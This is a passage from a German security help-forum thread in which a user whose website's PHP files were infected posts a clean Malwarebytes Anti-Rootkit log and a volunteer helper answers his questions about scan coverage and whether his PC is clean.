Vielen Dank für die weiteren Tipps.

Revo Uninstaller wurde wie beschrieben ausgeführt.
Die betroffenen Attention-Installationen wurden alle deinstalliert.

mbar.exe wurde ausgeführt.
Es kam eine Meldung, dass kein CleanUp erforderlich ist.

Die Log-Einträge:
Code:
ATTFilter
Malwarebytes Anti-Rootkit BETA 1.07.0.1012
www.malwarebytes.org

Database version: v2014.06.16.07

Windows XP Service Pack 3 x86 NTFS
Internet Explorer 8.0.6001.18702
Gengler :: PC_TG [administrator]

16.06.2014 21:24:35
mbar-log-2014-06-16 (21-24-35).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 404965
Time elapsed: 37 minute(s), 13 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)
         
Mal eine (vielleicht etwas blöde) Frage mit meinem grenzenlosen Halbwissen

Durchsucht mbar.exe wirklich wenn ich es mit dem Administrator-Account ausführe auch alle Dateien von dem Account, mit dem ich normalerweise arbeite und mit dem ich auch das betroffene FTP-Programm nutze?

Hintergrund meiner Frage:
In der Log-Datei sieht man ja, dass mbar.exe 404.965 Objekte gescannt hat.
Kaspersky Internet Secuity hat aber gestern 669.104 Dateien durchsucht.

Viele Grüße,
Metallica81


Alt 17.06.2014, 09:52   #6
schrauber
/// the machine
/// TB-Ausbilder
 

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



ein echtes AV Programm durchsucht jeden Scheiss der Festplatte bei einem Deepscan. Ein spezielles Tool wie ein Rootkit Scanner wird zb die Privat-Filmchen mit der Liebsten aussen vor lassen. Die können zwar auch schön oder erschreckend sein, enthalten aber bestimmt kein Rootkit


Aber Du kannst den Scan gerne im betroffenen Account wiederholen.
__________________
--> Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt

Alt 17.06.2014, 21:00   #7
Metallica81
 
Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



Bedeutet der mbar-Scan ohne Fund, dass der PC wirklich sauber ist, oder muss ich noch irgendwas unternehmen um sicherzugehen?
Dann könnte ich ja einfach das FTP-Passwort ändern und alles wäre wieder OK...

Wie kommt denn jemand so gezielt auf meinen FTP-Account wenn ich keinen Trojaner habe.
Oder ist es theoretisch möglich, dass mein Kaspersky den Trojaner inzwischen beseitigt hat, aber vorher schon etwas passiert war?

Alt 18.06.2014, 17:57   #8
schrauber
/// the machine
/// TB-Ausbilder
 

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



Theoretisch möglich ist alles. man brauch auch kein FTP Passwort um ne Seite zu hacken.
Ich kann dir nur sagen dass der Rechner sauber ist laut Logfiles.
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 23.06.2014, 21:21   #9
Metallica81
 
Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



Vielen Dank für die Hilfe!
Habe eine kleine Spende da gelassen.

Alt 24.06.2014, 17:13   #10
schrauber
/// the machine
/// TB-Ausbilder
 

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



Gern Geschehen
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Antwort

Themen zu Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt
adware, agent, befall, bilder, dateien, e-mail, excel, festplatte, forum, hintergrund, homepage, infiziert, neu, nichts, passwort, rechner, remote, remover, scan, seiten, server, sicherheitslücke, trojaner, trojaner; php; schadcode, webseite, zugriff, ändern




Ähnliche Themen: Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt


  1. schädlicher link mit werbebannern http://tracking999.com
    Plagegeister aller Art und deren Bekämpfung - 17.06.2013 (19)
  2. Steinigt mich! Ich habe ihn zu den Ausnahmen hinzugefügt!
    Log-Analyse und Auswertung - 05.05.2013 (3)
  3. Seit gestern Abend GVU 2.07 Trojaner bereits mit Mwb gescannt u. Logfiles hinzugefügt
    Log-Analyse und Auswertung - 31.07.2012 (8)
  4. Script in HTML-Quellcode
    Log-Analyse und Auswertung - 14.03.2012 (12)
  5. Kaspersky Meldet schädlicher link
    Plagegeister aller Art und deren Bekämpfung - 28.12.2011 (2)
  6. Youtube Account möglicherweise gehacked? Arabische Songs zu Playlists hinzugefügt?
    Log-Analyse und Auswertung - 29.09.2011 (7)
  7. Schädlicher Code in Bildern, gar Audio?
    Diskussionsforum - 11.05.2011 (4)
  8. Schädlicher Eintrag?
    Log-Analyse und Auswertung - 20.04.2011 (21)
  9. Schädlicher Code auf eigener Homepage
    Plagegeister aller Art und deren Bekämpfung - 20.12.2010 (0)
  10. Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!
    Plagegeister aller Art und deren Bekämpfung - 19.12.2010 (4)
  11. session manager value hinzugefügt bootexecute autocheck autochk *\
    Überwachung, Datenschutz und Spam - 03.10.2009 (3)
  12. Schädlicher Eintrag gefunden
    Log-Analyse und Auswertung - 06.07.2009 (7)
  13. Schädlicher Eintrag???
    Mülltonne - 12.09.2008 (0)
  14. Laut Logfileauswertung Schädlicher Eintrag
    Plagegeister aller Art und deren Bekämpfung - 02.07.2007 (8)
  15. Nach Server Hack komische dateien ...
    Plagegeister aller Art und deren Bekämpfung - 04.10.2006 (6)
  16. Multimedia-Dateien im Web - Server/Pfad feststellen
    Alles rund um Windows - 18.08.2006 (9)
  17. Fremde URLs werden einfach hinzugefügt!?!?
    Plagegeister aller Art und deren Bekämpfung - 22.09.2005 (3)

Zum Thema Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Hallo, Ich habe von meinem Hosting-Provider eine E-Mail erhalten, dass bei einem routinemäßigen Virenscan Dateien mit Schadcode gefunden wurden. Betroffen sind nach näherer Analyse alle PHP-Skripte auf meiner Homepage, die - Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt...
Archiv
Du betrachtest: Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.